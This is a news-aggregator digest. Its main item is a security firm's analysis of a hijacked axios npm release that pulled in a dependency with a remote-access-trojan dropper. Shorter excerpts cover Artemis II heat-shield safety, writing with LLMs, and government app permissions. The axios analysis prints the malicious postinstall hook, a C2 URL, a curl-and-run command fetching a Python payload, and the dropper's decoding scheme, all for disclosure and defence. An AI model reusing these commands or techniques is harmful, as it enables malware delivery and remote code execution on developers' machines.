10 interesting stories served every morning and every evening.




1 1,602 shares, 109 trendiness

Malicious Versions Drop Remote Access Trojan

Hijacked maintainer account used to publish poisoned axios releases including 1.14.1 and 0.30.4. The attacker injected a hidden dependency that drops a cross-platform RAT. We are actively investigating and will update this post with a full technical analysis. StepSecurity is hosting a community town hall on this incident on April 1st at 10:00 AM PT - Register Here.

axios is the most popular JavaScript HTTP client library, with over 100 million weekly downloads. On March 30, 2026, StepSecurity identified two malicious versions of it published to npm: axios@1.14.1 and axios@0.30.4. The malicious versions inject a new dependency, plain-crypto-js@4.2.1, which is never imported anywhere in the axios source code. Its sole purpose is to execute a postinstall script that acts as a cross-platform remote access trojan (RAT) dropper targeting macOS, Windows, and Linux. The dropper contacts a live command-and-control server and delivers platform-specific second-stage payloads. After execution, the malware deletes itself and replaces its own package.json with a clean decoy to evade forensic detection.

There are zero lines of malicious code inside axios itself, and that’s exactly what makes this attack so dangerous: the poisoned releases carry only the fake dependency, and the postinstall script does all the work. A developer who inspects their node_modules folder after the fact will find no indication anything went wrong.

This was not opportunistic. It was precision.
The malicious dependency was staged 18 hours in advance. Three payloads were pre-built for three operating systems. Both release branches were poisoned within 39 minutes of each other. Every artifact was designed to self-destruct. Within two seconds of npm install, the malware was already calling home to the attacker’s server, before npm had even finished resolving dependencies. This is among the most operationally sophisticated supply chain attacks ever documented against a top-10 npm package.

These compromises were detected by StepSecurity AI Package Analyst [1][2] and StepSecurity Harden-Runner. We have responsibly disclosed the issue to the project maintainers.

StepSecurity Harden-Runner, whose community tier is free for public repos and is used by over 12,000 public repositories, detected the compromised axios package making anomalous outbound connections to the attacker’s C2 domain across multiple open source projects. For example, Harden-Runner flagged the C2 callback to sfrclak.com:8000 during a routine CI run in the backstage repository, one of the most widely used developer portal frameworks. The Backstage team has confirmed that this workflow is intentionally sandboxed and that the malicious package install does not impact the project. The connection was automatically marked as anomalous because it had never appeared in any prior workflow run. Harden-Runner insights for community-tier projects are public by design, allowing anyone to verify the detection: https://app.stepsecurity.io/github/backstage/backstage/actions/runs/23775668703?tab=network-events

[Community Webinar] axios Compromised on npm: What We Know, What You Should Do

Join StepSecurity on April 1st at 10:00 AM PT for a live community briefing on the axios supply chain attack. We’ll walk through the full attack chain, indicators of compromise, and remediation steps, then open it up for Q&A.

Register for the webinar →

The attack was pre-staged across roughly 18 hours, with the malicious dependency seeded on npm before the axios releases to avoid “brand-new package” alarms from security scanners:

plain-crypto-js@4.2.0, published by nrwise@proton.me — a clean decoy containing a full copy of the legitimate crypto-js source, with no postinstall hook. Its sole purpose is to establish npm publishing history so the package does not appear to come from a zero-history account during later inspection.

plain-crypto-js@4.2.1, published by nrwise@proton.me — malicious payload added. The "postinstall": "node setup.js" hook and the obfuscated dropper are introduced.

axios@1.14.1, published by the compromised jasonsaayman account (email: ifstap@proton.me) — injects plain-crypto-js@4.2.1 as a runtime dependency, targeting the modern 1.x user base.

axios@0.30.4, published by the same compromised account — identical injection into the legacy 0.x branch, published 39 minutes later to maximize coverage across both release lines.

npm unpublishes axios@1.14.1 and axios@0.30.4. Both versions are removed from the registry and the latest dist-tag reverts to 1.14.0. axios@1.14.1 had been live for approximately 2 hours 53 minutes; axios@0.30.4 for approximately 2 hours 15 minutes. The timestamp is inferred from the axios registry document’s modified field (03:15:30Z) — npm does not expose a dedicated per-version unpublish timestamp in its public API.

npm initiates a security hold on plain-crypto-js, beginning the process of replacing the malicious package with an npm security-holder stub.

npm publishes the security-holder stub plain-crypto-js@0.0.1-security.0 under the npm@npmjs.com account, formally replacing the malicious package on the registry. plain-crypto-js@4.2.1 had been live for approximately 4 hours 27 minutes. Attempting to install any version of plain-crypto-js now returns the security notice.

The attacker compromised the jasonsaayman npm account, the primary maintainer account of the axios project. The account’s registered email was changed to ifstap@proton.me — an attacker-controlled ProtonMail address. Using this access, the attacker published malicious builds across both the 1.x and 0.x release branches, maximizing the number of projects exposed.

Both axios@1.14.1 and axios@0.30.4 are recorded in the npm registry as published by jasonsaayman, making them indistinguishable from legitimate releases at a glance. Both versions were published using the compromised npm credentials of a lead axios maintainer, bypassing the project’s normal GitHub Actions CI/CD pipeline.

A critical forensic signal is visible in the npm registry metadata. Every legitimate axios 1.x release is published via GitHub Actions with npm’s OIDC Trusted Publisher mechanism, meaning the publish is cryptographically tied to a verified GitHub Actions workflow. axios@1.14.1 breaks that pattern entirely — published manually via a stolen npm access token, with no OIDC binding and no gitHead:

// axios@1.14.0 — LEGITIMATE
"_npmUser": {
  "name": "GitHub Actions",
  "email": "npm-oidc-no-reply@github.com",
  "trustedPublisher": {
    "id": "github",
    "oidcConfigId": "oidc:9061ef30-3132-49f4-b28c-9338d192a1a9"
  }
}

// axios@1.14.1 — MALICIOUS
"_npmUser": {
  "name": "jasonsaayman",
  "email": "ifstap@proton.me"
  // no trustedPublisher, no gitHead, no corresponding GitHub commit or tag
}

There is no commit or tag in the axios GitHub repository that corresponds to 1.14.1. The release exists only on npm. The OIDC token that legitimate releases use is ephemeral and scoped to the specific workflow — it cannot be stolen. The attacker must have obtained a long-lived classic npm access token for the account.

Before publishing the malicious axios versions, the attacker pre-staged plain-crypto-js@4.2.1 from the nrwise@proton.me account. This package:

Masquerades as crypto-js, with an identical description and a repository URL pointing to the legitimate brix/crypto-js GitHub repository

Contains "postinstall": "node setup.js" — the hook that fires the RAT dropper on install

Pre-stages a clean package.json stub in a file named package.md, for evidence destruction after execution

The decoy version (4.2.0) was published 18 hours earlier to establish publishing history — a clean package in the registry that makes nrwise look like a legitimate maintainer.

What changed between 4.2.0 (decoy) and 4.2.1 (malicious)

A complete file-level comparison between plain-crypto-js@4.2.0 and plain-crypto-js@4.2.1 reveals exactly three differences; every other file (all 56 crypto source files, the README, the LICENSE, and the docs) is identical between the two versions.

The 56 crypto source files are not just similar; they are bit-for-bit identical to the corresponding files in the legitimate crypto-js@4.2.0 package published by Evan Vosberg. The attacker made no modifications to the cryptographic library code whatsoever. This was intentional: any diff-based analysis comparing plain-crypto-js against crypto-js would find nothing suspicious in the library files and would focus attention on package.json — where the postinstall hook looks, at a glance, like a standard build or setup task.

The anti-forensics stub (package.md) deserves particular attention. After setup.js runs, it renames package.md to package.json. The stub reports version 4.2.0 — not 4.2.1:

// Contents of package.md (the clean replacement stub)
{

  "name": "plain-crypto-js",
  "version": "4.2.0",  // ← reports 4.2.0, not 4.2.1 — deliberate mismatch
  "description": "JavaScript library of crypto standards.",
  "license": "MIT",
  "author": { "name": "Evan Vosberg", "url": "http://github.com/evanvosberg" },
  "homepage": "http://github.com/brix/crypto-js",
  "repository": { "type": "git", "url": "http://github.com/brix/crypto-js.git" },
  "main": "index.js",
  // No "scripts" key — no postinstall, no test
  "dependencies": {}
}

This creates a secondary deception layer. After infection, running npm list in the project directory will report plain-crypto-js@4.2.0 — because npm list reads the version field from the installed package.json, which now says 4.2.0. An incident responder checking installed packages would see a version number that does not match the malicious 4.2.1 version they were told to look for, potentially leading them to conclude the system was not compromised.

# What npm list reports POST-infection (after the package.json swap):

$ npm list plain-crypto-js
myproject@1.0.0
└── plain-crypto-js@4.2.0   # ← reports 4.2.0, not 4.2.1
                            # but the dropper already ran as 4.2.1

# The reliable check is the DIRECTORY PRESENCE, not the version number:
$ ls node_modules/plain-crypto-js
aes.js  cipher-core.js  core.js  …
# If this directory exists at all, the dropper ran.
# plain-crypto-js is not a dependency of ANY legitimate axios version.

The difference between the real crypto-js@4.2.0 and the malicious plain-crypto-js@4.2.1 is a single field in package.json:

// crypto-js@4.2.0 (LEGITIMATE — Evan Vosberg / brix)
{

  "name": "crypto-js",
  "version": "4.2.0",
  "description": "JavaScript library of crypto standards.",
  "author": "Evan Vosberg",
  "homepage": "http://github.com/brix/crypto-js",
  "scripts": {
    "test": "grunt"   // ← no postinstall
  }
}

// plain-crypto-js@4.2.1 (MALICIOUS — nrwise@proton.me)
{
  "name": "plain-crypto-js",   // ← different name, everything else cloned
  "version": "4.2.1",          // ← version one ahead of the real package
  "description": "JavaScript library of crypto standards.",
  "author": { "name": "Evan Vosberg" },   // ← fraudulent use of real author name
  "homepage": "http://github.com/brix/crypto-js",   // ← real repo, wrong package
  "scripts": {
    "test": "grunt",
    "postinstall": "node setup.js"   // ← THE ONLY DIFFERENCE. The entire weapon.
  }
}

The attacker published axios@1.14.1 and axios@0.30.4 with "plain-crypto-js": "^4.2.1" added as a runtime dependency — a package that has never appeared in any legitimate axios release. The diff is surgical: every other dependency is identical to the prior clean version.

When a developer runs npm install axios@1.14.1, npm resolves the dependency tree and installs plain-crypto-js@4.2.1 automatically. npm then executes plain-crypto-js’s postinstall script, launching the dropper.

Phantom dependency: A grep across all 86 files in axios@1.14.1 confirms that plain-crypto-js is never imported or require()’d anywhere in the axios source code. It is added to package.json only to trigger the postinstall hook. A dependency that appears in the manifest but has zero usage in the codebase is a high-confidence indicator of a compromised release.

The Surgical Precision of the Injection

A complete binary diff between axios@1.14.0 and axios@1.14.1 across all 86 files (excluding source maps) reveals that exactly one file changed: package.json. Every other file — all 85 library source files, type definitions, README, CHANGELOG, and compiled dist bundles — is bit-for-bit identical between the two versions.

# File diff: axios@1.14.0 vs axios@1.14.1 (86 files, source maps excluded)

DIFFERS: package.json
Total differing files: 1
Files only in 1.14.1: (none)
Files only in 1.14.0: (none)

# --- axios/package.json (1.14.0)

# +++ axios/package.json (1.14.1)
- "version": "1.14.0",
+ "version": "1.14.1",
  "scripts": {
    "fix": "eslint --fix lib/**/*.js",
-   "prepare": "husky"
  },
  "dependencies": {
    "follow-redirects": "^2.1.0",
    "form-data": "^4.0.1",
    "proxy-from-env": "^2.1.0",
+   "plain-crypto-js": "^4.2.1"
  }

Two changes are visible: the version bump (1.14.0 → 1.14.1) and the addition of plain-crypto-js. There is also a third, less obvious change: the "prepare": "husky" script was removed. husky is the git hook manager used by the axios project to enforce pre-commit checks. Its removal from the scripts section is consistent with a manual publish that bypassed the normal development workflow — the attacker edited package.json directly, without going through the project’s standard release tooling, which would have re-added the husky prepare script.

The same analysis applies to axios@0.30.3 → axios@0.30.4:

# --- axios/package.json (0.30.3)

# +++ axios/package.json (0.30.4)
- "version": "0.30.3",
+ "version": "0.30.4",
  "dependencies": {
    "follow-redirects": "^1.15.4",
    "form-data": "^4.0.4",
    "proxy-from-env": "^1.1.0",
+   "plain-crypto-js": "^4.2.1"
  }

Again — exactly one substantive change: the malicious dependency injection. The version bump itself (from 0.30.3 to 0.30.4) is simply the required npm version increment to publish a new release; it carries no functional significance.

setup.js is a single minified file employing a two-layer obfuscation scheme designed to evade static analysis tools and confuse human reviewers. All sensitive strings — module names, OS identifiers, shell commands, the C2 URL, and file paths — are stored as encoded values in an array named stq[]. Two functions decode them at runtime:

_trans_1(x, r) — XOR cipher. The key "OrDeR_7077" is parsed through JavaScript’s Number(): alphabetic characters produce NaN, which in bitwise operations becomes 0. Only the digits 7, 0, 7, 7 in positions 6–9 survive, giving an effective key of [0,0,0,0,0,0,7,0,7,7]. Each character at position r is decoded as:

charCode XOR key[(7 × r × r) % 10] XOR 333

_trans_2(x, r) — Outer layer. Reverses the encoded string, replaces _ with =, base64-decodes the result (interpreting the bytes as UTF-8 to recover Unicode code points), then passes the output through _trans_1.

The dropper’s entry point is _entry("6202033"), where 6202033 is the C2 URL path segment. The full C2 URL is: http://sfrclak.com:8000/6202033

StepSecurity fully decoded every entry in the stq[] array. The recovered plaintext reveals the complete attack:

stq[0]  → "child_process"             // shell execution

stq[1]  → "os"                        // platform detection
stq[2]  → "fs"                        // filesystem operations
stq[3]  → "http://sfrclak.com:8000/"  // C2 base URL
stq[5]  → "win32"                     // Windows platform identifier
stq[6]  → "darwin"                    // macOS platform identifier
stq[12] → "curl -o /tmp/ld.py -d packages.npm.org/product2 -s SCR_LINK && nohup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &"
stq[13] → "package.json"              // deleted after execution
stq[14] → "package.md"                // clean stub renamed to package.json
stq[15] → ".exe"
stq[16] → ".ps1"
stq[17] → ".vbs"

The complete attack path from npm install to C2 contact and cleanup, across all three target platforms.

With all strings decoded, the dropper’s full logic can be reconstructed and annotated. The following is a de-obfuscated, commented version of the _entry() function that constitutes the entire dropper payload. Original variable names are preserved; comments are added for clarity.

// setup.js — de-obfuscated and annotated

// SHA-256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09

...
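The two decoding layers described above are simple to reproduce. The sketch below is a re-implementation from the published description, not the attacker’s original code (the names xorKeyFromString, trans1, and trans2 are invented); because XOR is its own inverse, trans1 both encodes and decodes:

```javascript
// Re-implementation of the dropper's two string-decoding layers, as described.
// Names are illustrative; the original used _trans_1 / _trans_2.
function xorKeyFromString(s) {
  // Number("O") is NaN, and NaN | 0 coerces to 0 in bitwise math,
  // so the key "OrDeR_7077" collapses to [0,0,0,0,0,0,7,0,7,7].
  return [...s].map((ch) => Number(ch) | 0);
}

// Inner layer: charCode XOR key[(7 * r * r) % 10] XOR 333 at each position r.
function trans1(text, key) {
  let out = "";
  for (let r = 0; r < text.length; r++) {
    out += String.fromCharCode(text.charCodeAt(r) ^ key[(7 * r * r) % 10] ^ 333);
  }
  return out;
}

// Outer layer: reverse the string, restore base64 padding ("_" → "="),
// decode the base64 as UTF-8, then run the inner XOR layer.
function trans2(encoded, key) {
  const b64 = [...encoded].reverse().join("").replace(/_/g, "=");
  const inner = Buffer.from(b64, "base64").toString("utf8");
  return trans1(inner, key);
}
```

Nothing about the scheme is cryptographically strong; its only job is to keep strings like "child_process" and the C2 URL out of static scanners’ sight.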

Read the original on www.stepsecurity.io »

2 733 shares, 49 trendiness

Artemis II Is Not Safe to Fly (Idle Words)

Artemis II Is Not Safe to Fly

“Our test facilities can’t reach the combination of heat flux, pressure, shear stresses, etc., that an actual reentering spacecraft does. We’re always having to wait for the flight test to get the final certification that our system is good to go.” —Jeremy VanderKam, deputy manager for Orion’s heat shield, speaking in 2022

On Wednesday, NASA will attempt to send four astronauts around the moon on a mission called Artemis II. This will be the second flight of NASA’s SLS rocket, and the first time the 20-year-old Orion capsule flies with people on board.

The trouble is that the heat shield on Orion blows chunks. Not in some figurative, pejorative sense, but in the sense that when NASA flew this exact mission in 2022, large pieces of material blew out of Orion’s heat shield during re-entry, leaving divots. Large bolts embedded in the heat shield also partially eroded and melted through.

NASA’s initial instinct was to cover up the problem. In early press releases, they stressed that both rocket and spacecraft had performed exceptionally, while declining to publish the post-flight assessment review. The first mention of heat shield damage came from Orion program manager Howard Hu on a call with reporters in March of 2023. Hu said: “we observed there were more variations across the heat shield than we expected; some of the expected char material that we would expect coming back home ablated away differently than what our computer models and what our ground testing predicted.”

Asked by a journalist to quantify the char loss in a January 2024 phone call, Moon-to-Mars Deputy Administrator Amit Kshatriya said: “it was very small localized areas. Interestingly, it would be much easier for us to analyze if we had larger chunks and it was more defined”. A Lockheed Martin representative on the same call added that there was “a healthy margin remaining of that virgin Avcoat. So it wasn’t like there were large, large chunks.”

It was­n’t un­til May 2024, when the Office of the Inspector General re­leased pho­tographs of the heat shield, that the ex­tent of the dam­age be­came clear. The prob­lem was­n’t char loss or ex­ces­sive ab­la­tion, but deep gouges and holes in many of the Avcoat blocks that com­prise the heat shield.

The Avcoat ma­te­r­ial is not de­signed to come out in chunks. It is sup­posed to char and flake off smoothly, main­tain­ing the over­all con­tours of the heat shield. But Orion is a fat and heavy space­craft, about twice as heavy as the Apollo com­mand mod­ule it is mod­eled af­ter. And the Avcoat heat shield is an ex­per­i­men­tal de­sign. No one has flown a seg­mented heat shield like this at lu­nar re­turn speeds, let alone on a space­craft this heavy.

The sub­stance of the OIG re­port was as alarm­ing as the pic­tures. The OIG iden­ti­fied three is­sues that could po­ten­tially kill the crew on Artemis II:

Heat shield spalling. This is the tech­ni­cal term for all those div­ots. Since spalling leaves voids and gaps in the heat shield ma­te­r­ial, it can ex­pose the un­pro­tected body of the cap­sule and lead to burn­through. Spalling also changes the pat­tern of hy­per­sonic air­flow around the cap­sule, cre­at­ing the po­ten­tial for lo­cal­ized hot spots and cas­cad­ing ef­fects.

Impact from heat shield frag­ments. When spalling sends pieces of heat shield into the hy­per­sonic airstream, they can strike the top of the cap­sule, dam­ag­ing the para­chute com­part­ment. Whether this hap­pened on Artemis I is un­known. As the OIG re­port pointed out with some frus­tra­tion, NASA failed to re­cover ei­ther the para­chutes or the para­chute cover, de­spite mak­ing elab­o­rate plans to do so. Any ev­i­dence of de­bris im­pact is now at the bot­tom of the Pacific Ocean.

Bolt ero­sion. The OIG re­port noted ero­sion and melt­ing in four large sep­a­ra­tion bolts that sit em­bed­ded in the heat shield. These bolts are packed with a heat-re­sis­tant ma­te­r­ial and are sup­posed to be rugged enough to sur­vive re-en­try. But three of the four bolts had melted through, due to a flaw in the heat­ing model NASA had used in de­sign­ing them. The re­port fur­ther noted: separation bolt melt be­yond the ther­mal bar­rier dur­ing reen­try can ex­pose the ve­hi­cle to hot gas in­ges­tion be­hind the heat shield, ex­ceed­ing Orion’s struc­tural lim­its and re­sult­ing in the breakup of the ve­hi­cle and loss of crew.”

So Orion had come back from the moon with dam­age se­vere enough to kill a crew three dif­fer­ent ways. Not good!

This left NASA in a quandary. The Orion cap­sule for Artemis II was al­ready mated to its ser­vice mod­ule. Taking it off to make changes to the heat shield, even if the agency knew what changes to make, would take years. Nor was there room in the sched­ule to con­duct a flight test, or any spare hard­ware to con­duct the flight test with. Each Orion costs north of a bil­lion dol­lars, and the only rocket it can launch on (SLS) costs two to four bil­lion dol­lars a shot, de­pend­ing on how you do the ac­count­ing.

Here it’s worth quoting Admiral Harold Gehman, who chaired the Columbia Accident Investigation Board, on what happens organizationally when a rigid schedule meets an immovable budget:

If a pro­gram man­ager is faced with prob­lems and short­falls and chal­lenges, if the sched­ule can­not be ex­tended, he ei­ther needs money, or he needs to cut into mar­gin. There were no other op­tions, so guess what the peo­ple at NASA did? They started to cut into mar­gins. No one di­rected them to do this. No one told them to do this. The or­ga­ni­za­tion did it, be­cause the in­di­vid­u­als in the or­ga­ni­za­tion thought they were de­fend­ing the or­ga­ni­za­tion. They thought they were do­ing what the or­ga­ni­za­tion wanted them to do.

And so NASA looked for ways to talk it­self into be­liev­ing it was safe to fly a de­fec­tive heat shield.

In April 2024, the agency con­vened an in­de­pen­dent re­view panel. The find­ings of that panel were not made pub­lic, but in December NASA an­nounced that it had found a root cause for the heat shield dam­age. The Avcoat on the Artemis I heat shield was not suf­fi­ciently per­me­able, and so gas trapped un­der lay­ers of the ma­te­r­ial had ex­panded and blown pieces out of the heat shield. The process had been ex­ac­er­bated by the re-en­try tra­jec­tory, which had heat­ing oc­cur in two dis­tinct phases.

This was an awk­ward find­ing, since the heat shield NASA would use on Artemis II had been made even less per­me­able, to make it eas­ier to do ul­tra­sonic test­ing. But you fly with the heat shield you have, and the agency said it was con­fi­dent that a change to the re-en­try tra­jec­tory would be more than ad­e­quate to off­set any spalling is­sues.

Somewhat con­fus­ingly, they also an­nounced their in­ten­tion to switch to a new heat shield de­sign, start­ing with Artemis III. In other words, the Artemis II shield was com­pletely safe to fly, but they were never go­ing to fly it af­ter this mis­sion, and the re­place­ment de­sign would be tested for the first time on a fu­ture lu­nar mis­sion, with as­tro­nauts on board.

All of this was kind of pre­pos­ter­ous. As the YouTuber Eager Space has pointed out, if a com­mer­cial crew cap­sule (SpaceX Dragon or Boeing Starliner) re­turned to Earth with the kind of dam­age seen on Orion, NASA would in­sist on a re­design and an un­manned test flight to val­i­date it. But the agency does not hold its flag­ship pro­gram to the high stan­dard it de­mands from com­mer­cial crew, even though the same as­tro­naut lives are at stake.

Nor was it lost on ob­servers that the tools and mod­els NASA used to ar­rive at its new analy­sis were the same ones that had failed to pre­dict the spalling prob­lem in the first place. While the agency was able to work back­wards from flight data to in­duce flak­ing in a test coupon of Avcoat, they had no way of pre­dict­ing how the full-size heat shield would be­have in the new flight con­di­tions it would ex­pe­ri­ence on Artemis II.

You don’t have to be a ran­dom space blog­ger to find all this fishy. The most en­er­getic voice of pub­lic dis­sent has been heat shield ex­pert and Shuttle as­tro­naut Charles Camarda, the for­mer Director of Engineering at Johnson Space Center. Aghast at what he saw as a re­peat of the mo­ti­vated rea­son­ing that had led to the loss of Columbia and Challenger, Camarda be­gan mak­ing noise both in­side and out­side the agency, be­liev­ing that as­tro­nauts’ lives were at stake.

In a show of open­ness, NASA in­vited Camarda and two jour­nal­ists to at­tend a brief­ing on the heat shield in January of 2026, and gave him lim­ited ac­cess to some re­search ma­te­ri­als that have not been made pub­lic. But the ex­pe­ri­ence only deep­ened Camarda’s dis­tress, and he ended up pub­lish­ing a cri de coeur that I en­cour­age every­one to read in full.

In a nut­shell, Camarda ar­gues that NASA is demon­strat­ing the same dys­func­tion that led to the Columbia and Challenger dis­as­ters. Faced with an un­ex­pected en­gi­neer­ing fail­ure, it has built toy mod­els to con­vince it­self that the con­clu­sion it wants to reach (it’s safe to fly) are sup­ported by ev­i­dence. These toy mod­els are not grounded in physics, but be­cause they ap­pear to be quan­ti­ta­tive, they cre­ate a false sense of se­cu­rity and un­der­stand­ing, an epis­temic fig leaf for man­age­ment to hide be­hind.

Put more sim­ply, NASA is go­ing to fly Artemis II based on vibes, hop­ing that what­ever hap­pened to the heat shield on Artemis I won’t get bad enough to harm the crew on Artemis II.

A screen shot from re-en­try dur­ing Artemis I, show­ing a large burn­ing frag­ment of the Orion heat shield

What makes the sit­u­a­tion even more frus­trat­ing is the fact that, by the pro­gram’s own logic, there’s no rea­son to fly Artemis II with a crew at all.

In the orig­i­nal scheme for Artemis, Artemis II was the only op­por­tu­nity to fly Orion with as­tro­nauts on board be­fore the lu­nar land­ing at­tempt on Artemis III. Artemis III would be a scary mis­sion full of tech­ni­cal firsts (first land­ing, first use of the lu­nar lan­der, first dock­ing in deep space, etc), and it made sense to re­tire as much tech­ni­cal risk as pos­si­ble on a dry run around the Moon.

But in early 2026, NASA de­cided to add an ad­di­tional Artemis mis­sion to the man­i­fest. The new Artemis III would fly in 2027 as a near-Earth mis­sion to test dock­ing with what­ever lu­nar lan­der (Blue Origin or SpaceX) was avail­able. The first moon land­ing would be pushed back to the mis­sion af­ter that, Artemis IV.

This change removed any rationale for flying astronauts on Artemis II. If there are issues with Orion, it is safer for the crew to encounter them in Earth orbit than on a long trip around the Moon. And Artemis II could fly just as easily without astronauts on board, giving ground controllers launch experience and validating (or discrediting) NASA’s heat shield model without endangering a crew. NASA would lose a little face by essentially repeating Artemis I, but doing so would demonstrate that the agency really believes in the safety culture it so often gives lip service to.

Unfortunately, it looks like sunk costs and is­sues of face will win the day.

The engineers and managers at NASA are not stupid, and they are not cavalier with astronauts’ lives. They’ve read the Rogers Commission and CAIB reports, and many of them remember Challenger and Columbia firsthand. But they exist in a context.

That con­text is a moon pro­gram that has spent close to $100 bil­lion and 25 years with noth­ing to show for it­self, at an agency that has just ex­pe­ri­enced mass fir­ings and been through a near-death ex­pe­ri­ence with its sci­ence bud­get. The charis­matic new Administrator has staked his rep­u­ta­tion on in­creas­ing launch ca­dence, and set an ex­plicit goal of land­ing as­tro­nauts on the Moon be­fore President Trump’s term ex­pires in January of 2029.

So peo­ple are ty­ing them­selves into pret­zels to avoid say­ing the ob­vi­ous, that the Orion heat shield needs a suc­cess­ful flight test at lu­nar re-en­try speeds to avoid un­ac­cept­able risks to the crew.

If the Artemis II crew dies dur­ing re-en­try, we’ll get an­other lav­ishly re­searched re­port lay­ing out con­trib­u­tory fac­tors that are plainly vis­i­ble to any­one fol­low­ing the pro­gram right now. The space pro­gram will be de­layed by years, wait­ing for in­ves­ti­ga­tions to fin­ish and the wrath of Congress to abate. NASA will beat it­self up and add more lay­ers of safety bu­reau­cracy, un­til the same pro­gram pres­sures lead it to make the same mis­take again on a fu­ture flight.

It’s likely—hope­fully very likely—that Artemis II will land safely. But do we re­ally have to wait for as­tro­nauts to die to re-learn the same lessons a third time?

Good luck and god­speed to the as­tro­nauts on Artemis II.

If you en­joy my writ­ing on space, I in­vite you to sub­scribe to my Substack, Mars for the Rest of Us, where I write weekly short es­says on top­ics around Mars ex­plo­ration.

...

Read the original on idlewords.com »

3 691 shares, 29 trendiness

Don't Let AI Write For You

Don’t Let AI Write For You

When you write a document or essay, you are posing a question and then answering it. For example, a PRD answers the question, “What should we build?” A technical spec answers, “How should we build it?” Sometimes the question is more difficult to answer — “What are we even trying to accomplish?” And with every attempt at answering, you reflect on whether you’re asking the right question.

But now, of course, we have LLMs. I’m see­ing an in­creas­ing amount of LLM-generated doc­u­ments, ar­ti­cles, and es­says. I want to cau­tion against this. Each LLM-generated doc­u­ment is a missed op­por­tu­nity to think and build trust.

The goal of writ­ing is not to have writ­ten. It is to have in­creased your un­der­stand­ing, and then the un­der­stand­ing of those around you. When you are tasked to write some­thing, your job is to go into the murk­i­ness and come out of it with struc­ture and un­der­stand­ing. To con­quer the un­known.

The sec­ond or­der goal of writ­ing is to be­come more ca­pa­ble. It is like work­ing out. Every time you do a rep on the bound­ary of what you can do, you get stronger. It is un­com­fort­able and ef­fort­ful.

Letting an LLM write for you is like pay­ing some­body to work out for you.

There are so­cial ef­fects to LLM-generated writ­ing too. When I send some­body a doc­u­ment that whiffs of LLM, I’m only demon­strat­ing that the LLM pro­duced some­thing ap­prox­i­mat­ing what oth­ers want to hear. I’m not show­ing that I con­tended with the ideas.

It un­der­mines my cred­i­bil­ity as a per­son who could lead what­ever ini­tia­tive comes out of this doc­u­ment. That’s un­for­tu­nate. I could have used this op­por­tu­nity to es­tab­lish cred­i­bil­ity.

LLM-generated writ­ing un­der­mines the au­then­tic­ity of not just one’s writ­ing but of the think­ing be­hind it as well. If the prose is au­to­mat­i­cally gen­er­ated, might the ideas be too?

How LLMs can be used in the writ­ing process

LLMs are useful for research and checking your work. They can also work well for quickly recording information or transcribing text (neither of which is what I mean by “writing”, as in “writing an essay”).

They are par­tic­u­larly good at gen­er­at­ing ideas. They thrive in this use case be­cause if they gen­er­ate 10 things and only one is use­ful, no harm is done. You can take what is use­ful and leave the rest be­hind.

These LLMs will in­crease ef­fi­ciency in de­liv­er­ing soft­ware. But in or­der to make the most of them, we need a si­mul­ta­ne­ous rise in our level of thought­ful­ness.

...

Read the original on alexhwoods.com »

4 643 shares, 28 trendiness

13 Government Apps That Spy Harder Than the Apps They Ban

The fed­eral gov­ern­ment re­leased an app yes­ter­day, March 27th, and it’s spy­ware.

The White House app markets itself as a way to get “unparalleled access” to the Trump administration, with press releases, livestreams, and policy updates. The kind of content that every RSS feed on the planet delivers with one permission: network access. But the White House app, version 47.0.1 (because subtlety died a long time ago), requests precise GPS location, biometric fingerprint access, storage modification, the ability to run at startup, draw over other apps, view your Wi-Fi connections, and read badge notifications. It also ships with 3 embedded trackers including Huawei Mobile Services Core (yes, the Chinese company the US government sanctioned, shipping tracking infrastructure inside the sitting president’s official app), and it has an ICE tip line button that redirects straight to ICE’s reporting page.

This thing also has a “Text the President” button that auto-fills your message with “Greatest President Ever!” and then collects your name and phone number. There’s no specific privacy policy for the app, just a generic whitehouse.gov policy that doesn’t address any of the app’s tracking capabilities.

The White House app might ac­tu­ally be one of the milder ones. I’ve been go­ing through every fed­eral agency app I can find on Google Play, pulling their per­mis­sions from Exodus Privacy (which au­dits Android APKs for track­ers and per­mis­sions), and what I found de­serves its own term. I’m call­ing it Fedware.

Ok so let me walk you through what the fed­eral gov­ern­ment is run­ning on your phone.

The FBI’s app, myFBI Dashboard, requests 12 permissions including storage modification, Wi-Fi scanning, account discovery (it can see what accounts are on your device), phone state reading, and auto-start at boot. It also contains 4 trackers, one of which is Google AdMob, which means the FBI’s official app ships with an ad-serving SDK while also reading your phone identity. From what I found, the FBI’s news app has more trackers embedded than most weather apps.

The FEMA app re­quests 28 per­mis­sions in­clud­ing pre­cise and ap­prox­i­mate lo­ca­tion, and has gone from 4 track­ers in older ver­sions down to 1 in v3.0.14. Twenty-eight per­mis­sions for an app whose pri­mary func­tion is show­ing you weather alerts and shel­ter lo­ca­tions. To put that in con­text, the AP News app de­liv­ers the same kind of dis­as­ter cov­er­age with a frac­tion of the per­mis­sions.

IRS2Go has 3 track­ers and 10 per­mis­sions in its lat­est ver­sion, and ac­cord­ing to a TIGTA au­dit, the IRS re­leased this app to the pub­lic be­fore the re­quired Privacy Impact Assessment was even signed, which vi­o­lated OMB Circular A-130. The app shares de­vice IDs, app ac­tiv­ity, and crash logs with third par­ties, and TIGTA found that the IRS never con­firmed that fil­ing sta­tus and re­fund amounts were masked and en­crypted in the app in­ter­face.

MyTSA comes in lighter with 9 permissions and 1 tracker, but still requests precise and approximate location. The TSA’s own Privacy Impact Assessment says the app stores location locally and claims it never transmits GPS data to TSA. I’ll give them credit for documenting that, because most of these apps have privacy policies that read like ransom notes.

CBP Mobile Passport Control is where things get genuinely alarming. This one requests 14 permissions including 7 classified as “dangerous”: background location tracking (it follows you even when the app is closed), camera access, biometric authentication, and full external storage read/write. And the whole CBP ecosystem, from CBP One to CBP Home to Mobile Passport Control, feeds data into a network that retains your faceprints for up to 75 years and shares it across DHS, ICE, and the FBI.

The government also built a facial recognition app called Mobile Fortify that ICE agents carry in the field. It draws from hundreds of millions of images across DHS, FBI, and State Department databases. ICE Homeland Security Investigations signed a $9.2 million contract with Clearview AI in September 2025, giving agents access to over 50 billion facial images scraped from the internet. DHS’s own internal documents admit Mobile Fortify can be used to “amass biographical information of individuals regardless of citizenship or immigration status”, and CBP confirmed it will “retain all photographs”, including those of U.S. citizens, for 15 years.

Photos submitted through CBP Home, biometric scans from Mobile Passport Control, and faces captured by Mobile Fortify all feed this system. And the EFF found that ICE does not allow people to opt out of being scanned, and agents can use a facial recognition match to determine your immigration status even when other evidence contradicts it. A U.S.-born citizen was told he could be deported based on a biometric match alone.

